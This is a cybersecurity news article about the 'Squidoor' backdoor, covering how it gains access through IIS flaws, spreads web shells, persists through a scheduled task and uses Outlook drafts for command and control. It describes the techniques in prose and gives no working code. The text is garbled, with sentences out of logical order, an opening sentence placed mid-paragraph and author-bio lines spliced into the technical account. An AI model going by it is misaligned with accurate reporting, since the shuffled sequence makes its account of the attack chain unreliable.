The malware, designed for exceptional stealth, offers attackers multiple methods to maintain persistent access to compromised networks while evading detection from advanced security systems. These methods include HTTP-based communication, reverse TCP/UDP connections, DNS tunneling, and even Microsoft Outlook mail API communication, allowing attackers to adapt to different network environments and security controls. A sophisticated backdoor malware called “Squidoor” being deployed by suspected Chinese threat actors against organizations across South America and Southeast Asia. It then queries the drafts folder in Outlook, searching for emails with specific subject line patterns containing randomly generated numbers that help differentiate between different Squidoor implants. For persistence, Squidoor creates a scheduled task named “Microsoft\Windows\AppID\EPolicyManager” that executes the malicious shellcode at regular intervals, ensuring the backdoor remains active even after system reboots. Initial access is gained primarily through exploiting vulnerabilities in Internet Information Services (IIS) servers, followed by the deployment of multiple web shells that serve as persistent backdoors. Palo Alto Networks researchers identified that Squidoor is a sophisticated multi-platform backdoor built specifically to operate undetected in highly monitored and secured networks. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. The malware exists in both Windows and Linux variants, demonstrating the threat actor’s commitment to compromising diverse environments regardless of operating system. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Perhaps the most innovative aspect of Squidoor is its ability to leverage Microsoft Outlook as a covert communication channel. The Windows version supports ten different protocols for command and control (C2) communication, while the Linux version supports nine. “The threat actor stored some of the web shells on bashupload.com and downloaded and decoded them using certutil,” according to the research report. The attackers then used curl and Impacket to spread the web shells across different servers within compromised networks. When configured to use this method, the malware logs into the Microsoft identity platform using a hard-coded refresh token. Email contents undergo multiple stages of processing: transformation using CryptStringToBinaryA WinAPI, Base64 decoding, a combination of AES and custom XOR decryption, and finally zlib decompression. Tushar is a Cyber security content editor with a passion for creating captivating and informative content.
This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 12 Mar 2025 08:40:17 +0000